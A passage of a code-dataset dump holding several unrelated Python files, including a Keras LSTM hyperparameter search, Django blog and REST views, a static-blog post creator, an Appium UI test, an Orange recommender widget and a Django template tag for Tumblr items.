test_split\n\t\t\n\t@property\n\tdef nb_epoch(self):\n\t\treturn self._nb_epoch\t\n\t\n\t@nb_epoch.setter\t\n\tdef nb_epoch(self, nb_epoch):\n\t\tself._nb_epoch = nb_epoch\n\t\t\n\t@property\n\tdef lstm_layers(self):\n\t\treturn self._lstm_layers\t\n\t\n\t@lstm_layers.setter\t\n\tdef lstm_layers(self, layers):\n\t\tself._lstm_layers = layers\n\t\t\n\t@property\n\tdef output_folder(self):\n\t\treturn self._output_folder\t\n\t\n\t@output_folder.setter\t\n\tdef output_folder(self, output_folder):\n\t\tself._output_folder = output_folder\n\t\t\n\tdef get_filename(self):\n\t\tif self.output_folder is not None and self.output_folder != '' and os.path.exists(self.output_folder):\n\t\t\treturn os.path.join(self.output_folder,str(self)+'.txt')\n\t\treturn str(self) + 
'.txt'\n\t\t\n\tdef __str__(self):\n\t\treturn 'lstm_config=' + str(self.embedding_size) + '_' + str(self.batch_size) + '_' + str(self.nb_epoch)\n\t\ndef batch_randomizer():\n\tnb_epochs = [5,15,30,45,60,75,100]\n\tbatch_sizes = [8,16,32,64,128]\n\tembedding_sizes = [1000,5000,10000,100000]\n\tlstm_layers = [[],[256,128],[256,128,64]]\n\toutput_folder = '.lstm_results'\n\tcombinaisons = []\n\tfor epoch in nb_epochs:\n\t\tfor batch in batch_sizes:\n\t\t\tfor embedding_size in embedding_sizes:\t\t\t\n\t\t\t\tfor lstm_layer in lstm_layers:\n\t\t\t\t\tcombinaisons.append([epoch,batch,embedding_size,lstm_layer])\n\t\n\tshuff_comb = list(combinaisons)\n\trandom.shuffle(shuff_comb)\n\tmax_score = [0.0,0.0]\n\tfor combinaison in shuff_comb:\n\t\tconfig = Config()\n\t\tconfig.output_folder = output_folder\n\t\tconfig.nb_epoch = combinaison[0]\n\t\tconfig.batch_size = combinaison[1]\n\t\tconfig.embedding_size = combinaison[2]\n\t\tconfig.lstm_layers = combinaison[3]\n\t\tfull_path = config.get_filename()\n\t\tif os.path.exists(full_path) :\n\t\t\tprint('This sample has already been test, look into ',full_path,' file')\n\t\telse:\n\t\t\tprint('testing -> epochs=',config.nb_epoch,'batch_size=',config.batch_size,'embedding_size=',config.embedding_size,'lstm_layers=',config.lstm_layers)\n\t\t\tscore,new_model = test_cnn_lstm(config)\t\n\t\t\tif score[1]>max_score[1]:\n\t\t\t\tmax_score = score\n\t\t\t\tprint('New high score : ',max_score)\n\t\t\t\tf_max = open(config.get_filename()+'-best.txt','a')\n\t\t\t\tf_max.write(json.dumps(config.__dict__))\n\t\t\t\tf_max.write('\\n'+str(max_score)+'\\n'+'*'*10+'\\n')\t\n\ndef predict_sentence(model,line,voc,classes,config):\n\tX = []\n\twords = []\n\tword_index = []\n\tcount=0\n\tfor x in voc:\n\t\tword_index.append(x[0])\n\t\tcount += 1\n\t\t\n\tfor word in line.split(' '):\n\t\tif word in word_index:\n\t\t\twords.append(word_index.index(word)+3)\n\t\telse:\n\t\t\twords.append(2)\n\twords.append(1)\n\tX.append(words) \n\tX = sequence.pad_sequences(X)\t\n\tprint(classes)\t\n\tprint(model.predict_proba(X,batch_size=config.batch_size))\n\ndef try_this():\n\tconfig = Config()\n\tconfig.dataset_file = '../datasets/little/agent.txt'\n\tconfig.batch_size = 6\n\tconfig.embedding_size = 1000\n\tconfig.nb_epoch = 20\n\t#config.lstm_layers = [256,128,64,32]\n\tmodel = test_cnn_lstm(config)\n\tvoc,classes = get_vocabulary(config.dataset_file)\n\txtr,ytr,xte,yte=load_dataset(config.dataset_file,config.embedding_size,config._dataset_test_split)\n\t\n\ttxte = []\n\tfor a in xte:\n\t\ts = []\n\t\tfor w in a:\n\t\t\tif w-3>0:\n\t\t\t\ts.append(voc[w-3][0])\n\t\ttxte.append(' '.join(s))\n\t\n\tfor s in txte:\n\t\tprint(s)\n\t\tpredict_sentence(model,s,voc,classes,config)\n\t\n\tline = input('sentence to predict : ')\n\twhile line is not 'exit':\t\t\n\t\tpredict_sentence(model,line,voc,classes,config)\n\t\tline = input('sentence to predict : ')\n\nif __name__ == '__main__':\n\tbatch_randomizer()", "sub_path": "scripts/reuters tests/reuters_lstm_batch.py", "file_name": "reuters_lstm_batch.py", "file_ext": "py", "file_size_in_byte": 9563, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "keras.callbacks.Callback", "line_number": 23, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", 
"line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pathlib.PurePath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 87, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pathlib.PurePath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 120, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 121, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 121, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 122, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 123, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 123, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 126, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 127, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 129, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 131, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 134, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 135, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.layers.core.Activation", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 260, "usage_type": "call"}, {"api_name": "os.path", "line_number": 260, "usage_type": 
"attribute"}, {"api_name": "json.dumps", "line_number": 269, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 288, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 288, "usage_type": "name"}]} +{"seq_id": "243520356", "text": "from django.conf import settings\n\nfrom django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\n\nfrom django.core.paginator import Paginator\nfrom django.core.paginator import EmptyPage\nfrom django.core.paginator import PageNotAnInteger\nfrom django.core.mail import send_mail\n\nfrom django.http import HttpResponse\n\nfrom artigos.models import Artigo\nfrom artigos.forms import FormContato\n\n\ndef index(request, pagina=1):\n\tpaginacao = Paginator(Artigo.objects.all(), 3)\n\ttry:\n\t\tresumo = paginacao.page(pagina)\n\texcept PageNotAnInteger:\n\t\t# se a pagina não for um número inteiro, pega a primeira\n\t\tresumo = paginacao.page(1)\n\texcept EmptyPage:\n\t\t# se a pagina estiver fora do limite, pega a ultima\n\t\tresumo = paginacao.page(paginacao.num_pages)\n\n\treturn render(request, 'index.html', {\n\t\t\t\t\t\t'artigos': resumo.object_list,\n\t\t\t\t\t\t'paginacao': resumo,\n\t\t\t\t\t\t'page_now': pagina,\n\t\t\t\t\t})\n\n\ndef artigo(request, url):\n\treturn render(request, 'detail.html', {\n\t\t\t'artigo': get_object_or_404(Artigo, url=url),\n\t\t\t'media_url': settings.MEDIA_URL\n\t\t})\n\n\ndef form_pequisa(request):\n\treturn render(request, 'search_form.html')\n\n\ndef pesquisa(request):\n\tif 'q' in request.GET and request.GET['q']:\n\t\tq = request.GET['q']\n\t\tartigos = Artigo.objects.filter(titulo__contains=q) | Artigo.objects.filter(conteudo__contains=q)\n\t\treturn render(request, 'search_results.html', {'artigos': artigos, 'query': q})\n\telse:\n\t\treturn render(request, 'search_form.html', {'erro': True})\n\n\ndef contato(request):\n\tif request.method == 'POST':\n\t\tform = FormContato(request.POST)\n\t\tif form.is_valid():\n\t\t\temail = ['leonardo.cintra@luizalabs.com']\n\t\t\tremetente = form.cleaned_data['email']\n\t\t\tassunto = 'CONTATO - ' + form.cleaned_data['nome']\n\t\t\tmensagem = 'Telefone: ' + form.cleaned_data['telefone'] + \"
\" + form.cleaned_data['mensagem']\n\t\t\tsend_mail(assunto, mensagem, remetente, email)\n\n\t\t\treturn render(request, 'contact.html', {'form': FormContato(), 'send': True})\n\telse:\n\t\tform = FormContato()\n\n\treturn render(request, 'contact.html', {'form': form})\n", "sub_path": "app2/artigos/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.core.paginator.Paginator", "line_number": 18, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "artigos.models.Artigo", "line_number": 18, "usage_type": "name"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 21, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "artigos.models.Artigo", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 38, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "artigos.models", "line_number": 49, "usage_type": "name"}, {"api_name": "artigos.models.Artigo.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "artigos.models.Artigo.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "artigos.models.Artigo", "line_number": 49, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "artigos.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 57, "usage_type": "call"}, {"api_name": "django.core.mail.send_mail", "line_number": 63, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 65, "usage_type": "call"}, {"api_name": "artigos.forms.FormContato", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "631319103", "text": "import json\nimport time\n\nimport os.path\nfrom xpinyin import Pinyin\n\nfrom common import file, console\nfrom manage import get\n\nsystem_info = json.loads(file.read_file(\"./config/system.json\"))\n\ndef get_name(name_input):\n p = Pinyin()\n name = name_input.replace(\" \", \"-\")\n name = get.filter_name(name)\n return p.get_pinyin(name)\n\ndef new_post_init(config, independent=False):\n title = config[\"title\"]\n name = get.filter_name(config[\"name\"])\n if not os.path.exists(\"./document/{}.md\".format(name)):\n editor = system_info[\"Editor\"]\n os.system(\"{0} ./document/{1}.md\".format(editor, name))\n post_info = {\"name\": name, \"title\": title, \"time\": time.time()}\n if not os.path.exists(\"./document/{}.md\".format(name)):\n console.log(\"Error\", \"Cannot find [./document/{}.md] 
file\".format(name))\n return\n if not independent:\n excerpt = get.get_excerpt(\"./document/{}.md\".format(name))\n post_info[\"excerpt\"] = excerpt\n\n write_json = post_info\n page_config = \"./document/{}.json\".format(name)\n\n if not independent:\n write_json = json.loads(file.read_file(\"./config/page.json\"))\n write_json.insert(0, post_info)\n page_config = \"./config/page.json\"\n\n file.write_file(page_config, json.dumps(write_json, indent=4, sort_keys=False, ensure_ascii=False))\n\n console.log(\"Success\", \"Create a new article successfully!\")\n", "sub_path": "manage/new_post.py", "file_name": "new_post.py", "file_ext": "py", "file_size_in_byte": 1401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 10, "usage_type": "call"}, {"api_name": "common.file.read_file", "line_number": 10, "usage_type": "call"}, {"api_name": "common.file", "line_number": 10, "usage_type": "name"}, {"api_name": "xpinyin.Pinyin", "line_number": 13, "usage_type": "call"}, {"api_name": "manage.get.filter_name", "line_number": 15, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 15, "usage_type": "name"}, {"api_name": "manage.get.filter_name", "line_number": 20, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "os.path.system", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "name"}, {"api_name": "time.time", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "common.console.log", "line_number": 26, "usage_type": "call"}, {"api_name": "common.console", "line_number": 26, "usage_type": "name"}, {"api_name": "manage.get.get_excerpt", "line_number": 29, "usage_type": "call"}, {"api_name": "manage.get", "line_number": 29, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "common.file.read_file", "line_number": 36, "usage_type": "call"}, {"api_name": "common.file", "line_number": 36, "usage_type": "name"}, {"api_name": "common.file.write_file", "line_number": 40, "usage_type": "call"}, {"api_name": "common.file", "line_number": 40, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "common.console.log", "line_number": 42, "usage_type": "call"}, {"api_name": "common.console", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "108778299", "text": "# -*- coding: utf-8 -*-\n# @Time : 2021/7/1 22:01\n# @Author : wkRonin\n# @File :test_luzhi.py\n# This sample code uses the Appium python client\n# pip install Appium-Python-Client\n# Then you can paste this into a file and simply run with Python\n# pip install appium-python-client\nimport time\n\nfrom appium import webdriver\n\ncaps = {}\ncaps[\"platformName\"] = \"Android\"\ncaps[\"appPackage\"] = \"com.tencent.wework\"\ncaps[\"appActivity\"] = \".launch.LaunchSplashActivity\"\ncaps[\"deviceName\"] = \"hogwarts\"\ncaps[\"noReset\"] = \"true\"\n# 至关重要的一行 与appium 服务建立连接,并传递一个caps 字典对象\ndriver = 
webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\ntime.sleep(5)\nel1 = driver.find_element_by_xpath(\"//*[@text='通讯录']\")\nel1.click()\ntime.sleep(3)\nel2 = driver.find_element_by_id(\"com.tencent.wework:id/hci\")\nel2.click()\ntime.sleep(3)\nel3 = driver.find_element_by_id(\"com.tencent.wework:id/g5f\")\nel3.send_keys(\"朱维康\")\nel4 = driver.find_element_by_id(\"com.tencent.wework:id/d_1\")\nel4.click()\n\n\ndriver.quit()\n", "sub_path": "test_appium/test_luzhi.py", "file_name": "test_luzhi.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "appium.webdriver.Remote", "line_number": 20, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "193169697", "text": "from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QApplication\n\nfrom Orange.data import Table\nfrom Orange.widgets import settings\nfrom Orange.widgets import gui\nfrom Orange.widgets.utils.owlearnerwidget import OWBaseLearner\n\nfrom orangecontrib.recommendation import BRISMFLearner\n\n\nclass OWBRISMF(OWBaseLearner):\n # Widget needs a name, or it is considered an abstract widget\n # and not shown in the menu.\n name = \"BRISMF\"\n description = 'Matrix factorization with explicit ratings, learning is ' \\\n 'performed by stochastic gradient descent.'\n icon = \"icons/brismf.svg\"\n priority = 80\n\n LEARNER = BRISMFLearner\n\n outputs = [(\"P\", Table),\n (\"Q\", Table)]\n\n num_factors = settings.Setting(5)\n num_iter = settings.Setting(25)\n learning_rate = settings.Setting(0.005)\n bias_learning_rate = settings.Setting(0.005)\n lmbda = settings.Setting(0.02)\n bias_lmbda = settings.Setting(0.02)\n\n def add_main_layout(self):\n box = gui.widgetBox(self.controlArea, \"Parameters\")\n self.base_estimator = BRISMFLearner()\n\n gui.spin(box, self, \"num_factors\", 1, 10000,\n label=\"Number of latent factors:\",\n alignment=Qt.AlignRight, callback=self.settings_changed)\n\n gui.spin(box, self, \"num_iter\", 1, 10000,\n label=\"Number of iterations:\",\n alignment=Qt.AlignRight, callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"learning_rate\", minv=1e-4, maxv=1e+5,\n step=1e-5, label=\"Learning rate:\", decimals=5,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"bias_learning_rate\", minv=1e-4, maxv=1e+5,\n step=1e-5, label=\"Learning rate:\", decimals=5,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"lmbda\", minv=1e-4, maxv=1e+4, step=1e-4,\n label=\"Regularization:\", decimals=4,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n gui.doubleSpin(box, self, \"bias_lmbda\", minv=1e-4, maxv=1e+4, step=1e-4,\n label=\"Bias regularization:\", decimals=4,\n alignment=Qt.AlignRight, controlWidth=90,\n callback=self.settings_changed)\n\n def create_learner(self):\n return self.LEARNER(\n num_factors=self.num_factors,\n num_iter=self.num_iter,\n learning_rate=self.learning_rate,\n bias_learning_rate=self.bias_learning_rate,\n lmbda=self.lmbda,\n bias_lmbda=self.bias_lmbda\n )\n\n def get_learner_parameters(self):\n return ((\"Number of latent factors\", self.num_factors),\n 
(\"Number of iterations\", self.num_iter),\n (\"Learning rate\", self.learning_rate),\n (\"Bias learning rate\", self.bias_learning_rate),\n (\"Regularization\", self.lmbda),\n (\"Bias regularization\", self.bias_lmbda))\n\n\nif __name__ == '__main__':\n app = QApplication([])\n widget = OWBRISMF()\n widget.show()\n app.exec()", "sub_path": "orangecontrib/recommendation/widgets/owbrismf.py", "file_name": "owbrismf.py", "file_ext": "py", "file_size_in_byte": 3320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Orange.widgets.utils.owlearnerwidget.OWBaseLearner", "line_number": 12, "usage_type": "name"}, {"api_name": "orangecontrib.recommendation.BRISMFLearner", "line_number": 21, "usage_type": "name"}, {"api_name": "Orange.data.Table", "line_number": 23, "usage_type": "name"}, {"api_name": "Orange.data.Table", "line_number": 24, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 26, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 26, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 27, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 27, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 28, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 28, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 29, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 30, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "Orange.widgets.settings.Setting", "line_number": 31, "usage_type": "call"}, {"api_name": "Orange.widgets.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.widgetBox", "line_number": 34, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 34, "usage_type": "name"}, {"api_name": "orangecontrib.recommendation.BRISMFLearner", "line_number": 35, "usage_type": "call"}, {"api_name": "Orange.widgets.gui.spin", "line_number": 37, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 37, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 39, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 39, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.spin", "line_number": 41, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 43, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 45, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 47, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 50, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 52, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 52, "usage_type": "name"}, {"api_name": 
"Orange.widgets.gui.doubleSpin", "line_number": 55, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 57, "usage_type": "name"}, {"api_name": "Orange.widgets.gui.doubleSpin", "line_number": 60, "usage_type": "call"}, {"api_name": "Orange.widgets.gui", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt.AlignRight", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QApplication", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "487143234", "text": "from django import template\nfrom django.db import models\nfrom django.template.loader import render_to_string\nfrom django.contrib.contenttypes.models import ContentType\n\n\nItem = models.get_model(\"djumblr\", \"tumbleitem\")\nregister = template.Library()\n\n\ndef tumblr_render(parser, token):\n bits = token.split_contents() \n if len(bits) < 2:\n raise template.TemplateSyntaxError(\"%r tag takes at least one argument\" % bits[0])\n\n item = bits[1]\n args = {}\n\n # Parse out extra clauses if given\n if len(bits) > 2:\n biter = iter(bits[2:])\n for bit in biter:\n if bit == \"using\":\n args[\"using\"] = biter.next()\n elif bit == \"as\":\n args[\"asvar\"] = biter.next()\n else:\n raise template.TemplateSyntaxError(\"%r tag got an unknown argument: %r\" % (bits[0], bit))\n\n return TumblrRenderNode(item, **args)\n\ntumblr_render = register.tag(tumblr_render)\n\n\nclass TumblrRenderNode(template.Node):\n def __init__(self, item, using=None, asvar=None):\n self.item = item\n self.using = using\n self.asvar = asvar\n\n def render(self, context):\n try:\n item = template.resolve_variable(self.item, context)\n except template.VariableDoesNotExist:\n return \"\"\n\n if isinstance(item, Item):\n object = item\n\n # If the item isn't an Item, try to look one up.\n else:\n object = item\n ct = ContentType.objects.get_for_model(item)\n try:\n item = Item.objects.get(content_type=ct, object_id=object._get_pk_val())\n except Item.DoesNotExist:\n return \"\"\n\n # Figure out which templates to use\n template_list = [\n \"djumblr/display/%s.html\" % item.content_type.name,\n \"djumblr/display/generic.html\"\n ]\n if self.using:\n try:\n using = template.resolve_variable(self.using, context)\n except template.VariableDoesNotExist:\n pass\n else:\n template_list.insert(0, using)\n\n # Render content, and save to self.asvar if requested\n context.push()\n context.update({\n \"item\" : item,\n \"object\" : object\n })\n rendered = render_to_string(template_list, context)\n context.pop()\n if self.asvar:\n context[self.asvar] = rendered\n return \"\"\n else:\n return rendered\n", "sub_path": "djumblr/templatetags/djumblr.py", "file_name": "djumblr.py", "file_ext": "py", "file_size_in_byte": 2517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.models.get_model", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.template.Library", "line_number": 8, "usage_type": "call"}, {"api_name": "django.template", "line_number": 8, "usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 14, "usage_type": "call"}, {"api_name": "django.template", "line_number": 14, 
"usage_type": "name"}, {"api_name": "django.template.TemplateSyntaxError", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template", "line_number": 28, "usage_type": "name"}, {"api_name": "django.template.Node", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 35, "usage_type": "name"}, {"api_name": "django.template.resolve_variable", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template", "line_number": 43, "usage_type": "name"}, {"api_name": "django.template.VariableDoesNotExist", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 44, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects.get_for_model", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.contenttypes.models.ContentType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.template.resolve_variable", "line_number": 66, "usage_type": "call"}, {"api_name": "django.template", "line_number": 66, "usage_type": "name"}, {"api_name": "django.template.VariableDoesNotExist", "line_number": 67, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 67, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "482553583", "text": "from .models import Idea, Version, Player\nfrom .forms import IdeaForm, SignUpForm\nfrom .tokens import account_activation_token\nfrom django.shortcuts import render, redirect, render_to_response\nfrom django.views import generic\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.auth import login, authenticate\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import viewsets\nfrom .serializers import UserSerializer, GroupSerializer, IdeaSerializer, HistorySerializer\nfrom .permissions import IsOwnerOrReadOnly\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all() #.order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass IdeaViewSet(viewsets.ModelViewSet):\n # ver = Version.objects.all().order_by('-pub_date')[0]\n # queryset = Idea.objects.all().filter(version=ver).order_by('-pub_date')\n queryset = Idea.objects.all()\n lookup_field = 'id'\n serializer_class = IdeaSerializer\n permission_classes = (IsOwnerOrReadOnly,)\n\n def pre_save(self, obj):\n obj.owner = self.request.user\n\n\nclass OwnIdeasViewSet(viewsets.ModelViewSet):\n serializer_class = IdeaSerializer\n\n def get_queryset(self):\n return Idea.objects.filter(self.request.user)\n\n\nclass IdeasViewSet(viewsets.ModelViewSet):\n serializer_class = IdeaSerializer\n\n def get_queryset(self):\n ver = Version.objects.all().order_by('-id')[0]\n return Idea.objects.filter(version=ver)\n\n\nclass 
